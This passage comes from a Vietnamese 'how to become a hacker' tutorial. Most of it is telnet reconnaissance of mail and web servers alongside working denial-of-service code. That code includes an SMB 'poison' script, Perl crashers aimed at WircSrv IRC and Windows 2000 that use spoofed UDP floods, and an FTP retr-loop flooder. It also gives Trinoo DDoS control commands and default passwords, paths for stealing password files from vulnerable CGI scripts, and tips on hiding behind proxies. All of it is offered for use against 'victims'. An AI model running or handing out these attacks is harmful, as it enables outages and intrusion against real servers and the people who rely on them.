00 00 00 00 f4 01 00 00 01 00 0d ff 00 00 00 ff

ff 02 00 f4 01 00 00 00 00 01 00 00 00 00 00 00

00 00 00 00 00 17 00 00 00 57 4f 52 4b 47 52 4f

55 50 00 55 6e 69 78 00 53 61 6d 62 61 00

""",

# Yêu cầu SMBtconX

"""

ff 53 4d 42 75 00

00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 f4 01 00 08 01 00 04 ff 00 00 00 00

00 01 00 17 00 00 5c 5c 2a 53 4d 42 53 45 52 56

45 52 5c 49 50 43 24 00 49 50 43 00

""",

# Yêu cầu khởI tạo SMBnt X

"""

ff 53 4d 42 a2 00

00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00

00 00 00 08 f4 01 00 08 01 00 18 ff 00 00 00 00

07 00 06 00 00 00 00 00 00 00 9f 01 02 00 00 00

00 00 00 00 00 00 00 00 00 00 03 00 00 00 01 00

00 00 00 00 00 00 02 00 00 00 00 08 00 5c 73 72

76 73 76 63 00

""",

# yêu cầu biên dịch SMB

"""

ff 53 4d 42 25 00

00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00

00 00 00 08 f4 01 00 08 01 00 10 00 00 48 00 00

00 48 00 00 00 00 00 00 00 00 00 00 00 00 00 4c

00 48 00 4c 00 02 00 26 00 00 08 51 00 5c 50 49

50 45 5c 00 00 00 05 00 0b 00 10 00 00 00 48 00

00 00 01 00 00 00 30 16 30 16 00 00 00 00 01 00

00 00 00 00 01 00 c8 4f 32 4b 70 16 d3 01 12 78

5a 47 bf 6e e1 88 03 00 00 00 04 5d 88 8a eb 1c

c9 11 9f e8 08 00 2b 10 48 60 02 00 00 00

""",

# SMBtrans Request

"""

ff 53 4d 42 25 00

00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00

00 00 00 08 f4 01 00 08 01 00 10 00 00 58 00 00

00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 4c

00 58 00 4c 00 02 00 26 00 00 08 61 00 5c 50 49

50 45 5c 00 00 00 05 00 00 03 10 00 00 00 58 00

00 00 02 00 00 00 48 00 00 00 00 00 0f 00 01 00

00 00 0d 00 00 00 00 00 00 00 0d 00 00 00 5c 00

5c 00 2a 00 53 00 4d 00 42 00 53 00 45 00 52 00

56 00 45 00 52 00 00 00 00 00 01 00 00 00 01 00

00 00 00 00 00 00 ff ff ff ff 00 00 00 00

"""

crud = map(a2b, crud)

def smb_send(sock, data, type=0, flags=0):

d = struct.pack('!BBH', type, flags, len(data))

#print 'send:', b2a(d+data)

sock.send(d+data)

def smb_recv(sock):

s = sock.recv(4)

assert(len(s) == 4)

type, flags, length = struct.unpack('!BBH', s)

data = sock.recv(length)

assert(len(data) == length)

#print 'recv:', b2a(s+data)

return type, flags, data

def nbss_send(sock, data):

sock.send(data)

def nbss_recv(sock):

s = sock.recv(4)

assert(len(s) == 4)

return s

def main(host, port=139):

s = socket(AF_INET, SOCK_STREAM)

s.connect(host, port)

nbss_send(s, nbss_session)

nbss_recv(s)

for msg in crud[:-1]:

smb_send(s, msg)

smb_recv(s)

smb_send(s, crud[-1]) # no response to this

s.close()

if __name__ == '__main__':

print 'Sending poison...',

main(sys.argv[1])

print 'done.'

Để có thể làm down được server của đối phương bạn cần phải có thời gian

DoS , nếu không có điều kiện chờ đợi tốt nhất bạn không nên sử dụng cách

này . Nhưng “vọc” thử cho biết thì được đúng không ?

Dạo chơi cùng Telnet

Telnet là gì?

Telnet là một chương trình terminal đầu cuối. Nó thường dùng để login vào một máy chủ nào đó trên các daemon khác nhau của máy chủ đó! Trong bài viết này, tôi sẽ chỉ cho bạn cách thu thập một số thông tin về máy chủ qua telnet. Bạn cũng sẽ được cách check mail, gởi mail và đặc biệt là có thể tham gia vào các kênh chat IRC của nước ngoài nữa đó! Tất cả chỉ bằng Telnet!

Daemon là gì?

Daemon(hay còn được gọi là "service") là một chương trình chạy trên một cổng nhất định nào đó. Nó sẽ chịu đáp ứng lại mọi yêu cầu của client khi client này kết nối đến server trên cổng đó. Ví dụ như smtp daemon theo mặc định chạy trên cổng 25. Để có thể check mail, máy của bạn phải kết nối đến server này trên cổng 25, cổng mà smtp daemon đang nắm giữ!

Một số lệnh cơ bản của Telnet

Đây là một số lệnh cơ bản của Telnet mà bạn cần nhớ!

close đóng kết nối hiện tại

logout

display hiển thị các tham số điều khiển

mode thay đổi mode kí tự

open kết nối đến một site

quit thoát telnet

send gởi các kí tự đặc biệt

set đặt các tham số điều khiển

unset gở bỏ các tham số điều khiển đã đặt

status cho biết các thông tin về trạng thái hiện tại

toggle chốt các tham số điều khiển

slc thay đổi trạng thái của các kí tự đặc biệt

z pause telnet

! tạo một subtelnet(telnet con)

environ thay đổi các biến trạng thái

? gọi hướng dẫn sử dụng telnet

(Để biết thêm thông tin về telnet, bạn hãy gõ "man telnet" trong Linux*)

Phát hiện WEB SERVER bằng telnet

http://k.domaindlx.com/clairsang/www.tnh.com.vn/default.htm đang dùng web server gì nhỉ? Bạn hãy mở "MS-DOS Prompt" và gõ vào:

C:\> telnet www.tnh.com.vn 80

Chúng ta telnet đến http://k.domaindlx.com/clairsang/www.tnh.com.vn/default.htm ở cổng 80!

Tiếp theo bạn gõ vào "GET / HTTP/1.1"(không có dấu nháy ") và nhấn phím <Enter> hai lần, bạn sẽ nhận được những thông tin sau:

HTTP/1.1 400 Bad Request

Server: Microsoft-IIS/4.0

Date: Wed, 04 Jul 2001 06:52:31 GMT

Content-Type: text/html

Content-Length: 87

<html><head><title>Error</title></head><body>The parameter is incorrect. </body>

</html>

Connection to host lost.

Hãy xem chúng ta thu thập được những gì?

dòng 1: phiên bản của http service: HTTP/1.1 (có khi là PHP/4.0). Đây là mã trạng thái HTML

dòng 2: http server, Microsoft-IIS/4.0

dòng 3: ngày giờ +GTM

dòng 4: phân loại nội dung

dòng 5: chiều dài của các kí tự

Chỉ cần để ý đến dòng 2, bạn có thể biết chắc ăn 100% là http://k.domaindlx.com/clairsang/www.tnh.com.vn/default.htm đang chạy IIS v4.0!

(Lưu ý: bạn hãy bật chế độ ghi nhật kí cho Telnet, mắt bạn không tài nào nhìn thấy được các dòng trên đâu! Nó hiện ra quá nhanh...! Hãy vào Terminal/Start Logging... và chỉ định một file nhật kí cho Telnet...!)

Bây giờ bạn thử telnet đến http://k.domaindlx.com/clairsang/www.astalavista.box.sk/default.htm xem sao?!

C:\> telnet www.astalavista.box.sk 80

GET / HTTP/1.1

HTTP/1.1 400 Bad Request

Date: Wed, 04 Jul 2001 06:51:37 GMT

Server: Apache/1.3.19 (Unix) PHP/4.0.4pl1

Connection: close

Transfer-Encoding: chunked

Content-Type: text/html; charset=iso-8859-1

Bạn có thể thấy ngay là http://k.domaindlx.com/clairsang/www.astalavista.box.sk/default.htm đang chạy Apache v1.3.19 trên nền Unix cùng với PHP v4.0.4!

Download và upload file bằng Telnet

Nếu bạn biết chính xác địa chỉ của một file trên http server, bạn có thể download nó về bằng cách telnet đến http server đó (ở cổng 80) và gõ vào theo dạng sau "HEAD <đường dẫn đến file cần download> HTTP/1.1" thay cho "GET / HTTP/1.1". Ví dụ như "HEAD /wordlist.txt HTTP/1.1"

Nếu http server cho phép bạn upload file(thường thì không có chuyện này đâu!), bạn hãy dùng lệnh "PUT" để upload file lên. Ví dụ như "PUT /contact.htm HTTP/1.1"

Gởi thư bằng Telnet(dùng SMTP)

SMTP - Simple Mail Transfer Protocol là một daemon thường dùng để send mail. Cổng mặc định của nó là 25. Okay, bây giờ bạn hãy mở telnet đi!

C:\> telnet mail.newmail.net 25

------ connected ------

220 digital Microsoft ESMTP MAIL Service, Version: 5.0.2195.1600 ready at Wed,

4 Jul 2001 18:47:27 +1000

-----------------------

dòng 1: mã số trạng thái 220: digital(domain hoặc địa chỉ ip của server): esmtp(extended) version 5.0.2195.1600

dòng 2: thời gian +GMT

Bây giờ thì bạn cần phải biết một số lệnh của smtp. Hãy gõ vào lệnh '?(hoặc '/?') và 'help' để gọi hướng dẫn! Tiếp theo, hãy send mail...!

----- các lệnh ------

HELO server.com (x authentication)

MAIL FROM: [email protected] (địa chỉ email của người gởi)

RCPT TO: [email protected] (địa chỉ email của người nhận)

DATA (các dữ liệu trong thư)

SUBJECT email subject (dòng subject)

một message cơ bản, cũng có khi là giả mạo

. (kết thúc message bằng một dòng chỉ có một dấu chấm '.')

----------------------

(Tôi không đề cập chi tiết cách gởi thư nặc danh ở đây, bạn hãy tham khảo bài viết "Gởi thư nặc danh và dội bom thư bằng Sendmail" sẽ rõ!)

Nhận thư qua Telnet(dùng POP3)

POP3 - Post Office Protocol Version 3. POP3 daemon thường được chạy ở cổng 110(đây là cổn chuẩn của nó). Để check mail, bạn phải kết nối đến server đang chạy POP3 daemon ở cổng 110!

C:\> telnet mail.newmail.net 110

------ connected ------

+OK DPOP Version number supressed. <[email protected]>

-----------------------

Bây giờ thì bạn có thể vào check mail được rồi đó! Hãy xem qua các lệnh sau:

----- các lệnh ------

USER username (username của bạn)

+OK dazzed nice to hear from you - password required

PASS password (mật khẩu để vào hòm thư của bạn)

+OK password accepted

LIST (liệt kê tất cả các thư)

1. 3045bytes

2. 345bytes

3. 8837bytes

RETR 2 (đọc lá thư thứ 2)

----------------------

Dễ không?

Tham gia vào các kênh chat IRC của nước ngoài!

Hãy theo tôi..!

Đầu tiên bạn telnet đến nether.net, đăng nhập với tên login là newuser và tạo một account cho bạn!

C:\> telnet nether.net

login: newuser

Okay, bây giờ hãy login vào với shell account mà bạn vừa đăng kí và chat IRC!

<[email protected]> IRC

mở IRC client

/SERVER irc.box.sk 6667

kết nối đến irc.box.sk ở cổng 6667

/NICK Dazzed

hãy chọn một nickname...!

/JOIN #lameindustries

bây giờ hãy tham gia vào kênh chat mà bạn muốn! :)

Port surfing(duyệt cổng)

Port surfing nghĩa là kết nối đến các cổng của một máy chủ để thu thập các thông tin, chẳng hạn như thời gian, hệ điều hành, các dịch vụ đang chạy, ...! Sau đây là danh sách một số cổng mà bạn nên biết!

Interesting ports

7 echo bất kì những gì bạn nhập vào sẽ được host gởi trả lại(echo) bạn, không hữu ích cho lắm!

11 systat rất nhiều thông tin về users

13 daytime thời gian và ngày tháng ở máy chủ

15 netstat thông tin về networks

21 ftp file transfer protocol

23 telnet nơi bạn có thể login.

25 smpt simple mail transfer protocol

37 time time

39 rlp resource location

43 whois thông tin về hosts và networks

53 domain nameserver

79 finger rất nhiều thông tin về users (thường bị disable)

80 http web server

110 pop incoming email

119 nntp usenet news groups

443 https một web server khác nhưng an toàn hơn!

512 biff mail notification

513 rlogin - remote login

514 shell remote command, không cần dùng mật khẩu! syslog remote system logging

520 route routing information protocol

Bạn thấy telnet thế nào? Tuyệt vời...! Tuy nhiên còn có một công cụ mạnh hơn cả Telnet nữa đó...! Netcat?! Bạn có thể vào đây download về tham khảo !

Những hiểu biết cơ bản nhất để trở thành Hacker (p3)

41 . ) Tấn công DDoS thông qua Trinoo :

_ Bạn đã biết DDoS attack là gì rồi phải không ? Một cuộc tấn công DDoS bằng

Trinoo được thực hiện bởi một kết nối của Hacker Trinoo Master và chỉ dẫn

cho Master để phát động một cuộc tấn công DDoS đến một hay nhiều mục tiêu.

Trinoo Master sẽ liên lạc với những Deadmons đưa những địa chỉ được dẫn

đến để tấn công một hay nhiều mục tiêu trong khoảng thời gian xác định .

_ Cả Master và Deamon đều được bảo vệ bằng Passwd . chỉ khi chúng ta biết

passwd thì mới có thể điều khiển được chúng , điều này không có gì khó

khăn nếu chúng ta là chủ nhân thực sự của chúng . Những passwd này thường

được mã hoá và bạn có thể thiết lập khi biên dịch Trinoo từ Source ----->

Binnary. Khi được chạy , Deadmons sẽ hiện ra một dấu nhắc và chờ passwd nhập

vào , nếu passwd nhập sai nó sẽ tự động thoát còn nếu passwd được nhập

đúng thì nó sẽ tự động chạy trên nền của hệ thống .

attacker$ telnet 10.0.0.1 27665

Trying 10.0.0.1

Connected to 10.0.0.1

Escape character is '^]'.

kwijibo

Connection closed by foreign host. < == Bạn đã nhập sai

attacker$ telnet 10.0.0.1 27665

Trying 10.0.0.1

Connected to 10.0.0.1

Escape character is '^]'.

betaalmostdone

trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/]

trinoo> < == bạn đã vào được hệ thống trinoo

_ Đây là vài passwd mặc định :

“l44adsl": pass của trinoo daemon .

"gorave": passwd của trinoo master server khi startup .

"betaalmostdone": passwd điều khiển từ xa chung cho trinoo master .

"killme": passwd trinoo master điều khiển lệnh "mdie" .

_ Đây là một số lệnh dùng để điều khiển Master Server:

CODE

die------------------------------------------------------------Shutdown.

quit------------------------------------------------------------Log off.

mtimer N----------------------------------------------------Đặt thờI gian để tấn công

DoS , vớI N nhận giá trị từ 1--> 1999 giây .

dos IP-------------------------------------------------------Tấn công đến một địa chỉ

IP xác định .

mdie pass---------------------------------------------------Vô hiệu hoá tất cả các

Broadcast , nếu như passwd chính xác . Một lệnh đưọc gửi tới ("d1e l44adsl")

Broadcast để Shutdown chúng . Một passwd riêng biệt sẽ được đặt cho mục này

mping--------------------------------------------------------Gửi một lệnh ping tới ("png

l44adsl") c¸c Broadcast.

mdos <ip1:ip2..> ------------------------------------------Send nhiều lênh DOS ("xyz l44adsl

123:ip1:ip2") đến các Broadcast.

info-------------------------------------------------------------Hiển thị thông tin về

Trinoo .

msize----------------------------------------------------------Đặt kích thước đệm cho

những gói tin được send đi trong suốt thờI gian DoS.

nslookup host----------------------------------------------Xác định tên thiết bị của

Host mà Master Trinoo đang chạy .

usebackup---------------------------------------------------Chuyển tớI các file Broadcast sao

lưu được tạo bởi lệnh “killdead”.

bcast-----------------------------------------------------------Liệt kê danh sách tất cả

các Broadcast có thể khai thác .

help [cmd] ---------------------------------------------------Đưa ra danh sách các lệnh .

mstop-----------------------------------------------------------Ngừng lại các cuốc tấn

công DOS .

_ Đây là một số lệnh dùng để điều khiển Trinoo Deadmons:

CODE

aaa pass IP----------------------------------------------------Tấn công đến địa chỉ IP

đã xác định . GửI gói tin UDP (0-65534) đến cổng của UDP của địa chỉ IP đã

xác định trong một khoảng thời gian xác định được mặc định là 120s hay từ

1-->1999 s .

bbb pass N-----------------------------------------------------Đặt thờI gian giới hạn cho

các cuộc tấn công DOS .

Shi pass--------------------------------------------------------Gửi chuỗi “*HELLO*” tới

dánh sách Master Server đã được biên dịch trong chương trình trên cổng

31335/UDP.

png pass-------------------------------------------------------Send chuỗi “Pong” tớI Master

Server phát hành các lệnh điều khiển trên cổng 31335/UDP.

die pass--------------------------------------------------------Shutdown Trinoo.

rsz N------------------------------------------------------------Là kích thước của bộ

đệm được dùng để tấn công , nó được tính bằng byte .

xyz pass 123:ip1:ip3----------------------------------------tấn công DOS nhiều mục tiêu

cùng lúc .

42 . ) Kỹ thuật ấn công DoS vào WircSrv Irc Server v5.07 :

_ WircSrv IRC là một Server IRC thông dụng trên Internet ,nó sẽ bị Crash nếu như

bị các Hacker gửi một Packet lớn hơn giá trị ( 65000 ký tự ) cho phép đến Port

6667.

Bạn có thể thực hiện việc này bằng cách Telnet đến WircSrv trên Port 6667:

Nếu bạn dùng Unix:

[[email protected]$ telnet irc.example.com 6667

Trying example.com...

Connected to example.com.

Escape character is '^]'.

[buffer]

Windows cũng tương tự:

telnet irc.example.com 6667

Lưu ý: [buffer] là Packet dữ liệu tương đương với 65000 ký tự .

Tuy nhiên , chúng ta sẽ crash nó rất đơn giản bằng đoạn mã sau ( Các bạn hãy

nhìn vào đoạn mã và tự mình giải mã những câu lệnh trong đó , đó cũng là

một trong những cách tập luyện cho sự phản xạ của các hacker khi họ nghiên

cứu . Nào , chúng ta hãy phân tích nó một cách căn bản ):

CODE

#!/usr/bin/perl #< == Đoạn mã này cho ta biết là dùng cho các lệnh trong perl

use Getopt::Std;

use Socket;

getopts('s:', \%args);

if(!defined($args{s})){&usage;}

my($serv,$port,$foo,$number,$data,$buf,$in_addr,$paddr,$proto);

$foo = "A"; # Đây là NOP

$number = "65000"; # Đây là tất cả số NOP

$data .= $foo x $number; # kết quả của $foo times $number

$serv = $args{s}; # lệnh điều khiển server từ xa

$port = 6667; # lệnh điều khiển cổng từ xa , nó được mặc định là 6667

$buf = "$data";

$in_addr = (gethostbyname($serv))[4] || die("Error: $!

");

$paddr = sockaddr_in($port, $in_addr) || die ("Error: $!

");

$proto = getprotobyname('tcp') || die("Error: $!

");

socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");

connect(S, $paddr) ||die ("Error: $!");

select(S); $| = 1; select(STDOUT);

print S "$buf";

print S "$buf";

print("Data has been successfully sent to $serv

");

sub usage {die("

Lỗi WircSrv Version 5.07s

có thể tấn công bằng DoS

gửi 2 64k gói tin đến server làm cho nó crash.

-s

server_ip

");}

Để sử dụng cái mã này , bạn hãy save nó vào một file *.pl , rồI down chương

trình activeperl về sài , setup nó rồi vào HĐH DOS bạn chỉ cần gọi file này ra

theo lệnh sau :

C:\>perl < đường dẫn đến file *.pl >

( Đến bây giờ tôi sẽ không bày thật cặn kẽ nữa mà sẽ tăng dần độ khó

lên , nếu bạn nào nghiên cứu kỹ các bài trước thì các bạn sẽ làm được

dễ dàng thôi )

43 . ) Kỹ thuật tấn công DoS vào máy tính sử dụng HĐH Win2000 :

_ Muốn sử dụng được nó , bạn phải có activeperl , rồi sử dụng như hướng

dẫn tương tự trên . Save đoạn mã vào file *.pl rồI dùng lệnh perl gọi nó ra :

CODE

#!/usr/bin/perl -w

use Socket;

use Net::RawIP;

use Getopt::Std;

getopts("s:d:p:l:n:v:t:f:T:rL",%o);$ver="0.3a";$0=~s#.*/##;

print"--- $0 v.$ver b/ Nelson Brito / Independent Security Consultant --- ";

$l=$o{'l'}?$o{'l'}+28:800+28;$n=$o{'n'}?$o{'n'}/2:800/2;

$v=$o{'v'}||4;$t=$o{'t'}||1;$f=$o{'f'}||0;$T=$o{'T'}||64;

$p=$o{'p'}?$o{'p'}:(getservbyname('isakmp','udp')||die"getservbyname: $! ");

($o{'s'}&&$o{'d'})||die

" Use: $0 [IP Options] [UDP Options] ",

"IP Options: ",

" -s* Đia chi nguon đe bat chuoc ",

" -d* Đia chi bi tan cong ",

" -v IP Version (def: $v) ",

" -t IP Type of Service (TOS) (def: $t) ",

" -f IP fragementation offset (def: $f) ",

" -T IP Time to Live (TTL) (def: $T) ",

"UDP Options: ",

" -p cong cua may tinh nan nhan (def: $p) ",

" -l chieu dai cua goi tin (def: $l) ",

" -r cai đat du lieu ngau nhien (def: ".") ",

"Generic: ",

" -n So luong goi tin ta muon gui đi (def: $n) ",

" -L gui goi tin lien tuc khong ngung cho đen khi may tinh cua nan nhan bi die he he",

" Bai huong dan cua ANHDENDAY . ";

while($n > 0){

$|=1;print".";$sp=int rand 65535;

$D=$o{'r'}?(chr(int rand 255)) x $l:"." x $l;

$nb=new Net::RawIP({

ip=>

{

version=>$v,

tos=>$t,

ttl=>$T,

frag_off=>$f,

saddr=>$o{'s'},

daddr=>$o{'d'}

},

udp=>

{

source=>$sp,

dest=>$p,

len=>$l,

data=>$D

}

});

$nb->send;undef $nb;!$o{'L'}&&$n--;

}

print"Finish! ";

_ Khi gọi ra bạn hãy chọn tuỳ chọn đã ghi ở trong đó mà DoS . Nhớ là chỉ

dùng cho Win2000 nhé .

44 . ) Kỹ thuật tấn công DoS dễ dàng nhất :

_ Tôi thì mỗi lần muốn tấn công bằng DoS đều dùng chương trình này , nó

chẳng kén gì cả và dễ thực hiện . Bây giờ tôi sẽ chia sẻ với các bạn .

_ Bạn cần phải có Activeperl ( lại là activepert ) đã cài sẵn , save đoạn mã

sau vào file abc.pl :

CODE

#!/usr/bin/perl

use IO::Socket;

sub initiate {

if ($ARGV[0] eq '') {die "Usage: perl abc.pl <host> <port> <username> <password>

Vi du : perl

abc.pl 127.0.0.1 21 anonymous me@

";}

$host = $ARGV[0];

$port = $ARGV[1];

$user = $ARGV[2];

$pass = $ARGV[3];

};

sub connecttoserver {

print("Connect den host: $host

");

$socket = IO::Socket::INET->new (PeerAddr => $host,

PeerPort => $port,

Proto => "tcp",

Type => SOCK_STREAM

) || die "khong the connect den $host";

print "Connect thanh cong . Loggin vao...

";

};

sub login {

print "user $user

";

print $socket "user $user

";

$response = <$socket>

print "$response

";

print "pass $pass

";

print $socket "pass $pass

";

$response = <$socket>

print "$response

";

print "Logged in. Dang tan cong DoS doi phuong. Nhan CTRL-C de ngung.

";

};

sub doit {

for (;; ){

print "retr a:/x

";

print $socket "retr a:/x

";

$response = <$socket>

print "$response";

}

}

initiate();

connecttoserver();

login();

doit();

_Nếu bạn từng qua lập trình khi đọc đoạn mã bạn sẽ thấy rằng đoạn mã

này dùng chính thông tin từ ổ đĩa A của nạn nhân để tấn công nạn nhân . Nó

sử dụng vòng lặp không có giới hạn từ hàm $socket "retr a:/x

" . Khi muốn

kết thúc bạn chỉ cần nhấn ctrl+C .

_Cuối cùng là bạn chỉ cần gọi nó ra thông qua lệnh perl như các bài trên .VD

:

perl abc.pl http://www.xxx.com/ anonymous me

trong đó User name và Password có thể là bất kỳ .

Vậy là coi như các bạn đã biết tấn công DoS là như thế nào rồi phải không ?

Đó chỉ là những cách tấn công DoS thông thường ( nhưng hậu quả thì chẳng

thường thường chút nào ) , còn các kỹ thuật DoS lợi hại khác như DRDoS thì cho

các bạn nghiên cứu thêm vậy . Nó rất nguy hiểm khi sử dụng lung tung nên để

dành phần đó cho các bạn nào thích và thật sự muốn nghiên cứu về nó . Tôi

xin dừng phần DoS tại đây .

45 . ) Tự tạo cho mình một proxy để sài :

_Trong các công việc như tấn công DoS hay đột nhập vào trang Web có trang bị

firewall thì bạn cần đến proxy để sài . Do đó các bạn hãy tự tạo cho mình

một cái proxy made in <yourname> sài cho nó oai . Bây giờ hãy làm cùng tôi .

_ Trước hết bạn đăng ký một host miễn phí ở trang free.prohosting.com . Bạn hãy

khai báo thông tin về bạn trong các ô nhập thông tin . Cuối cùng khi đăng ký xong

bạn sẽ nhận được Mail từ trang Web này gửi đến , hãy test nó để lấy pass

mặc định mà nó cho bạn .

_ Tiếp theo bạn vào trang www.xav.com , rồi nhấp vào link install phía dưới dòng

chữ Test - script Package( tui nhớ là có 2 cái tên mang chữ script này ) . Sau đó

bạn nhấn "next" và nhìn ở phía dưới của trang này có chữ show all verdon , bạn

hãy nhấn vào đó .

_ Tiếp tục bạn nhấn James Marshall ==>CGIscript ==>CGIproxy==>Next==>accept==> cho đến

khi bạn thấy một cái bảng có nhiều ô nhập thông tin . Bạn hãy nhập thông tin

vào các trang đó :

+ your Website : nhập địa chỉ trang Web của bạn đã đăng ký trong prohosting.com

.

+ FTP username : Bạn nhập username mà bạn đã đăng ký trong prohosting.com .

+ FTP password : Bạn nhập passwd mà prohosting.com đã send về mail cho bạn .

+ Mấy cái còn lại không cần thiết , bạn nhấp next để tiếp tục . Rồi nhấn

finish .

+ Cuối cùng nó sẽ cho bạn địa chỉ bạn vừa tạo cái proxy đó , bạn hãy ghi

nhớ nó . Sau này mỗi lần “hành động” thì bạn lại đem ra sài .

46 . ) Kỹ thuật lấy pass thông qua lỗi của một số Script :

a . ) Calendar CGI Script :

_ Một trong số những scripts đã tìm thấy điểm yếu đó là calendar scripts , nó

nằm trong thư mục cgi-bin/calendar, file config là file calendar.cfg chứa administrator

username và password để thay đổi chọn lựa cho scripts khi cần , cái này có thể

tìm thấy ở cuối file calendar.cfg , tuy nhiên chúng đã được mã hoá chúng ta chỉ

việc dùng John The Ripper hay những công cụ khác để giải mã nó là xong :

_file calendar.cfg thường đặt tại địa chỉ sau :

http://www.xxx.com/cgi-bin/calendar/calendar.cfg

sau khi crack xong chúng ta sẽ đến Admin Control Login vào địa chỉ :

http://www.xxx.com/cgi-bin/calen..._admin.pl?admin

_ Vậy là bạn đã có được quyền admin rồi đó .

b . ) WebBBS Script :

_WebAdverts Script là một scripts cho phép webmasters hiển thị những biểu ngữ luân

phiên ( quảng cáo chẳng hạn ) hay thêm vào trong trang Web , cuối cùng bạn có thể

sử dụng kết hợp password và username để cài đặt banners tạo một banner accounts

mới , xoá accounts view sensitive info, vv.vv

_Địa chỉ passwd của WebAdverts là :

http://www.xxx.com/cgi-bin/advert/adpassword.txt

sau khi giải mã bạn logging vào:

http://www.xxx.com/cgi-bin/advert/ads_admin.pl

để login như là script administrator .

c . ) WWWBoard Script :

_WWWBoard có file password có thể tìm thấy trong pasword.txt , chúng ta hãy search nó

bằng từ khoá cgi-bin/wwwebboard hoặc webboard/password.txt .

d . ) Mailmachine Script :

_Mailmachine.cgi là một webbased mailinglist , bạn có thể trông thấy file adressed.txt

chứa tất cả danh sách khách đã đăng ký , những danh sách có thể thấy tại

những urls sau:

http://www.xxx.com/cgi-bin/mailman/addresses.txt

http://www.xxx.com/cgi-bin/maillist/addresses.txt

http://www.xxx.com/cgi-bin/mail/addresses.txt

bạn cũng nên tìm addresses.txt mà đôi khi chúng được đổi thành các tên khác .

Chúng có thể chứa các thông tin quan trọng cho phép bạn khai thác .

Việc tìm ra các trang bị lỗi này hẳn các bạn đã biết , tôi sẽ không nhắc

lại nữa ( Nếu ai chưa biết thì vui lòng đọc lạI những phần trước ) .

======================================================

Nhân đây tôi xin đính chính lại là trong các đoạn code mà tôi phân tích và post

lên ở những phần trước tôi đã sơ ý không thêm ký hiệu “#” vào trước

những câu phân tích đó , dẫn đến việc một số bạn thắc mắc là đoạn code

không hoạt động . Tôi thành thật xin lỗi các bạn vì sơ ý của tôi , các bạn

chỉ cần lấy đoạn code đó ra và thêm vào dấu “ # ” ở phía trước dòng chú

thích Tiếng Việt của tôi là được ( Thông thường tôi có sử dụng dấu “ <

== ” để giải thích ở phiá đuôi đoạn code đó . Các bạn hãy để ý mà fix

nhé .

47 . ) Các công cụ cần thiết để hack Web :

_ Đối với các hacker chuyên nghiệp thì họ sẽ không cần sử dụng những công

cụ này mà họ sẽ trực tiếp setup phiên bản mà trang Web nạn nhân sử dụng

trên máy của mình để test lỗi . Nhưng đối với các bạn mới “vào nghề”

thì những công cụ này rất cần thiết , hãy sử dụng chúng một vài lần bạn

sẽ biết cách phối hợp chúng để việc tìm ra lỗi trên các trang Web nạn nhân

được nhanh chóng nhất . Sau đây là một số công cụ bạn cần phải có trên

máy “làm ăn” của mình :

_ Công cụ thứ 1 :

Một cái proxy dùng để che dấu IP và vượt tường lửa khi

cần ( Cách tạo 1 cái Proxy tôi đã bày ở phần 7 , các bạn hãy xem lại nhé )

.

_ Công cụ thứ 2 :

Bạn cần có 1 shell account, cái này thực sự quan trọng đối

với bạn . Một shell account tốt là 1 shell account cho phép bạn chạy các chương

trình chính như nslookup, host, dig, ping, traceroute, telnet, ssh, ftp,...và shell account

đó cần phải cài chương trình GCC ( rất quan trọng trong việc dịch (compile) các

exploit được viết bằng C) như MinGW, Cygwin và các dev tools khác.

Shell account gần giống với DOS shell,nhưng nó có nhiều câu lệnh và chức năng

hơn DOS . Thông thường khi bạn cài Unix thì bạn sẽ có 1 shell account, nếu bạn

không cài Unix thì bạn nên đăng ký trên mạng 1 shell account free hoặc nếu có ai

đó cài Unix và thiết lập cho bạn 1 shell account thì bạn có thể log vào telnet

(Start --> Run --> gõ Telnet) để dùng shell account đó. Sau đây là 1 số địa chỉ

bạn có thể đăng ký free shell account :

http://www.freedomshell.com/

http://www.cyberspace.org/shell.html

http://www.ultrashell.net/

_Công cụ thứ 3 :

NMAP là Công cụ quét cực nhanh và mạnh. Có thể quét trên

mạng diện rộng và đặc biệt tốt đối với mạng đơn lẻ. NMAP giúp bạn xem

những dịch vụ nào đang chạy trên server (services / ports : webserver , ftpserver ,

pop3,...),server đang dùng hệ điều hành gì,loại tường lửa mà server sử

dụng,...và rất nhiều tính năng khác.Nói chung NMAP hỗ trợ hầu hết các kỹ

thuật quét như : ICMP (ping aweep),IP protocol , Null scan , TCP SYN (half open),... NMAP

được đánh giá là công cụ hàng đầu của các Hacker cũng như các nhà quản

trị mạng trên thế giới.

Mọi thông tin về NMAP bạn tham khảo tại http://www.insecure.org/ .

_ Công cụ thứ 4 :

Stealth HTTP Security Scanner là công cụ quét lỗi bảo mật tuyệt

vời trên Win32. Nó có thể quét được hơn 13000 lỗi bảo mật và nhận diện

được 5000 exploits khác.

_ Công cụ thứ 5 :

IntelliTamper là công cụ hiển thị cấu trúc của một Website

gồm những thư mục và file nào, nó có thể liệt kê được cả thư mục và file

có set password. Rất tiện cho việc Hack Website vì trước khi bạn Hack một Website

thì bạn phải nắm một số thông tin của Admin và Website đó.

_ Công cụ thứ 6 :

Netcat là công cụ đọc và ghi dữ liệu qua mạng thông qua giao

thức TCP hoặc UDP. Bạn có thể dùng Netcat 1 cách trực tiếp hoặc sử dụng

chương trình script khác để điều khiển Netcat. Netcat được coi như 1 exploitation

tool do nó có thể tạo được liên kết giữa bạn và server cho việc đọc và ghi

dữ liệu ( tất nhiên là khi Netcat đã được cài trên 1 server bị lỗI ). Mọi

thông tin về Netcat bạn có thể tham khảo tại http://www.l0pht.com/ .

_ Công cụ thứ 7 :

Active Perl là công cụ đọc các file Perl đuôi *.pl vì các

exploit thường được viết bằng Perl . Nó còn được sử dụng để thi hành các

lệnh thông qua các file *.pl .

_ Công cụ thứ 8 :

Linux là hệ điều hành hầu hết các hacker đều sử dụng.

_ Công cụ thứ 9 :

L0phtCrack là công cụ số một để Crack Password của Windows

NT/2000 .

_ Cách Download tôi đã bày rồi nên không nói ở đây , các bạn khi Download nhớ

chú ý đến các phiên bản của chúng , phiên bản nào có số lớn nhất thì các

bạn hãy Down về mà sài vì nó sẽ có thêm một số tính năng mà các phiên bản

trước chưa có . Nếu down về mà các bạn không biết sử dụng thì tìm lại các

bài viết cũ có hướng dẫn bên Box “Đồ nghề” . Nếu vẫn không thấy thì

